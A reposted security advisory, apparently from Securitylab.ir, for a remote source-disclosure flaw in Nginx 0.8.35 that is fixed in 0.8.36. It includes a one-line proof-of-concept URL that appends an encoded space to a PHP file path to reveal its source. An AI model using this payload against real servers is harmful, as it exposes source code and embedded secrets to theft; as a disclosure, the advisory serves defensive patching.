Nginx 0.8.35 Space Character Remote Source Disclosure

最新推荐文章于 2024-09-24 08:15:00 发布

iteye_11341

最新推荐文章于 2024-09-24 08:15:00 发布

阅读量79

点赞数

文章标签：运维

本文披露了一个在Nginx 0.8.35版本中存在的远程文件泄露漏洞，该漏洞可能导致敏感信息被非法获取。漏洞发现者Pouya Daneshmand已确认0.8.36及更高版本不受此问题影响。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher is not vulnerable
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#################################################################
# Vulnerability:
# http://localhost/file.php%20
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & info@securitylab[dot]ir
###################################################################